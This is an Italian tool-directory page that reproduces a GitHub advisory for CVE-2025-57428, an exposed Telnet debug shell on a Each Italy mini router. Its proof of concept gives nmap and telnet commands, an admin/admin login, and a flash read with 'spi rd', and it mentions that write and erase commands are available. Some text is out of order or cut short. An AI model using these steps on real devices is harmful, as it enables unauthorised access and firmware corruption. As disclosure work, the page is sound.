Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-57428 — CVE-2025-57428 | Kitploit
Strumenti/GitHubGitHub/5ulfur/cve-2025-57428
Sicurezza Sistemi EmbeddedSicurezza IoTAnalisi delle VulnerabilitàExploitPenetration TestingSicurezza Hardware
GitHub5ulfur/cve-2025-57428

CVE-2025-57428

CVE-2025-57428

Vedi Repository
16 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

⚠️ Questo repository è mantenuto solo come riferimento per CVE-2025-57428.
Per altri advisory e aggiornamenti, consultare: security-advisories.

CVE-2025-57428 - Interfaccia di debug Telnet abilitata per impostazione predefinita consente l'accesso di basso livello a flash/registri

Prodotto interessato

  • Produttore/Marchio: Each Italy
  • Dispositivo: Wireless Mini Router WIRELESS-N 300M
  • Firmware: v28K.MiniRouter.20190211

Riepilogo

Questo dispositivo espone un'interfaccia di debug Telnet (abilitata per impostazione predefinita sulla porta 23) e accetta credenziali di amministratore (`admin`/`admin` per impostazione predefinita). Dopo l'autenticazione, la shell fornisce accesso diretto a comandi di basso livello (in particolare `spi` e `reg`), che possono portare a corruzione arbitraria del firmware, brick del dispositivo e perdita di funzionalità o configurazione di sicurezza.


Prova di concetto

Nota: Ometto intenzionalmente i comandi che eseguono scritture distruttive. La PoC seguente conferma l'esistenza e l'accessibilità dell'interfaccia senza fornire un exploit pronto per l'uso.

  1. Scansiona il dispositivo sulla LAN:

    root@kitploit:~
    nmap -p 23 <device-ip>
    

    Risultato: la porta 23 (telnet) mostra open.

  2. Connettersi tramite Telnet e autenticarsi (credenziali predefinite):

    root@kitploit:~
    telnet <device-ip>
    # Login as: admin
    # Password: admin
    

    Dopo il login, viene presentato un prompt di debug CMD>.

  3. Elenca i comandi disponibili:

    root@kitploit:~
    CMD>help
    

    L'output di help mostra i seguenti menu:

    root@kitploit:~
    cfg         net         os
    

    Entra nel menu os:

    root@kitploit:~
    CMD>os
    

    Elenca di nuovo i comandi disponibili:

    root@kitploit:~
    OS>help
    

    Questa volta l'output di help mostra i seguenti comandi:

    root@kitploit:~
    thread      mem         spi         reg         cpuload     cpubusy     event
    

    Usando viene mostrato .

Osservazioni:

  • Cambiare la password di amministratore tramite l'interfaccia web modifica anche le credenziali Telnet, indicando credenziali condivise.
  • Telnet rimane abilitato per impostazione predefinita dopo la configurazione iniziale.

Comunicazione con il venditore

I tentativi di trovare un contatto per la sicurezza o un canale di supporto del venditore originale non hanno avuto successo. Il prodotto sembra essere un dispositivo rebranded di origine sconosciuta.

Disclaimer

Queste informazioni sono fornite solo a scopo educativo e difensivo. L'autore non si assume alcuna responsabilità per l'uso improprio di queste informazioni.

Scarica lo strumento
spi
spi <rd/wr/er> <addr> [len]
  • Leggi la memoria flash:

    root@kitploit:~
    OS>spi rd 0x000fd0f0 16
    

    Questo restituisce un dump esadecimale della regione flash:

    root@kitploit:~
    4f30650a 938f56fa 1b663a19 e316d824
    

    Questo conferma che il comando funziona e che la shell ha accesso di basso livello. Anche il comando di scrittura (spi wr) e il comando di cancellazione (spi er), così come i comandi reg, sono eseguibili.